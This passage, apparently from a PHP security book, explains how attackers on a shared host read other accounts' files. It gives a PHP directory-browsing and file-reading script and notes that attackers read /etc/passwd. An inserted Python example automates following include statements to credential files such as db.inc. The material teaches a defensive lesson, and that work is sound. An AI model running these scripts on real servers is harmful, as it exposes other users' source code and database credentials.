Chapter 8: Viewing shared host file systems

Source: Internet
Author: User

8.4. Filesystem browsing

In addition to reading arbitrary files on the shared server, attackers can also write scripts that browse the filesystem. Because most of your sensitive files are probably not stored within the document root of your web site, such scripts are generally used to find the location of your source files. Consider the following example:

 

<PRE>
<?php

// Dispatch on the query string: ?dir=/path/ lists a directory,
// ?file=/path/to/file displays a file, and no parameter lists /.
if (isset($_GET['dir']))
{
    ls($_GET['dir']);
}
elseif (isset($_GET['file']))
{
    cat($_GET['file']);
}
else
{
    ls('/');
}

// Display the contents of a file, HTML-escaped so it renders as text.
function cat($file)
{
    echo htmlentities(file_get_contents($file), ENT_QUOTES, 'UTF-8');
}

// List a directory (the path is expected to end in '/'), linking each
// readable entry back to this script so the tree can be browsed by clicking.
function ls($dir)
{
    $handle = dir($dir);

    // Compare against false explicitly so an entry named "0" does not end the loop.
    while (false !== ($filename = $handle->read()))
    {
        $size = filesize("$dir$filename");

        if (is_dir("$dir$filename"))
        {
            $type = 'dir';
            $filename .= '/';
        }
        else
        {
            $type = 'file';
        }

        if (is_readable("$dir$filename"))
        {
            $line = str_pad($size, 15);
            $line .= "<a href=\"{$_SERVER['PHP_SELF']}";
            $line .= "?$type=$dir$filename\">$filename</a>";
        }
        else
        {
            $line = str_pad($size, 15);
            $line .= $filename;
        }

        echo "$line\n";
    }

    $handle->close();
}

?>
</PRE>

 

An attacker is likely to first view /etc/passwd or the /home directory to obtain a list of usernames on the server. Once a readable script has been found, its include and require statements reveal the location of source files stored outside the document root of the web site. For example, consider the following script, /home/victim/public_html/admin.php:

 

<?php

include '../inc/db.inc';

/* ... */

?>

 

If an attacker views the source of this file, the location of db.inc is revealed. The attacker can then use readfile() (or the cat() function of the browsing script above) to expose its contents and obtain the database access credentials. Storing db.inc outside the document root therefore offers no protection in this environment.
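The reconnaissance step just described (read a script, follow its include and require statements to files kept outside the document root, and check whether those files are readable) can be automated. The following is an added example written for this page, not code from the original text: it builds a constructed directory tree mirroring /home/victim/public_html/admin.php and ../inc/db.inc under a temporary directory, then walks the include chain. It assumes that relative include paths resolve against the directory of the requested script, which is how mod_php behaves because it sets the working directory to that of the script; include_path lookups are not modelled.

```python
# Added example (not from the original page): automate the recon step of
# following include/require statements from a readable PHP script to the
# source files it pulls in from outside the document root, and report which
# of those targets are readable. Runs offline on a constructed directory tree.
import os
import re
import tempfile

# Matches include/require/include_once/require_once with a single- or
# double-quoted literal path, with or without parentheses, e.g.
#   include '../inc/db.inc';      require_once("../lib/auth.php");
INCLUDE_RE = re.compile(
    r"""\b(include|require)(?:_once)?\s*\(?\s*(['"])(.+?)\2\s*\)?\s*;""",
    re.IGNORECASE,
)


def find_includes(php_source):
    """Return the literal paths named by include/require statements, in order."""
    return [m.group(3) for m in INCLUDE_RE.finditer(php_source)]


def resolve_include(script_path, include_path):
    """Resolve an include path relative to the including script's directory.

    Assumption: as under mod_php, ./ and ../ paths resolve against the
    directory of the requested script. Absolute paths are only normalised."""
    if os.path.isabs(include_path):
        return os.path.normpath(include_path)
    base = os.path.dirname(os.path.abspath(script_path))
    return os.path.normpath(os.path.join(base, include_path))


def follow_includes(script_path, seen=None):
    """Recursively follow includes starting at script_path.

    Returns {resolved_path: readable}. Targets that are readable are parsed
    in turn, so a chain admin.php -> db.inc -> config.inc is fully walked.
    An unreadable starting script yields an empty result."""
    if seen is None:
        seen = {}
    try:
        with open(script_path, "r", encoding="utf-8", errors="replace") as fh:
            source = fh.read()
    except OSError:
        return seen
    for inc in find_includes(source):
        target = resolve_include(script_path, inc)
        if target in seen:
            continue
        seen[target] = os.access(target, os.R_OK)
        if seen[target]:
            follow_includes(target, seen)
    return seen


def build_victim_tree():
    """Constructed sample layout mirroring the text: a document root holding
    admin.php, which includes ../inc/db.inc stored outside the document root.
    The credentials are placeholder values, not real data."""
    root = tempfile.mkdtemp(prefix="victim_")
    os.makedirs(os.path.join(root, "public_html"))
    os.makedirs(os.path.join(root, "inc"))
    admin = os.path.join(root, "public_html", "admin.php")
    with open(admin, "w", encoding="utf-8") as fh:
        fh.write("<?php\ninclude '../inc/db.inc';\n/* ... */\n?>\n")
    with open(os.path.join(root, "inc", "db.inc"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n$db_user = 'victim';\n$db_pass = 'constructed-sample';\n?>\n")
    return root, admin


if __name__ == "__main__":
    root, admin = build_victim_tree()
    for path, readable in follow_includes(admin).items():
        print(("readable   " if readable else "unreadable ") + path)
```

On a real shared host the same walk would be run against another account's scripts; the readability check is what matters, because it is the web server's effective user, not the file's owner, that the browsing script runs as.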

This attack illustrates why you should consider all of your source on a shared server to be public, and why you should consider using a database to store all sensitive data.
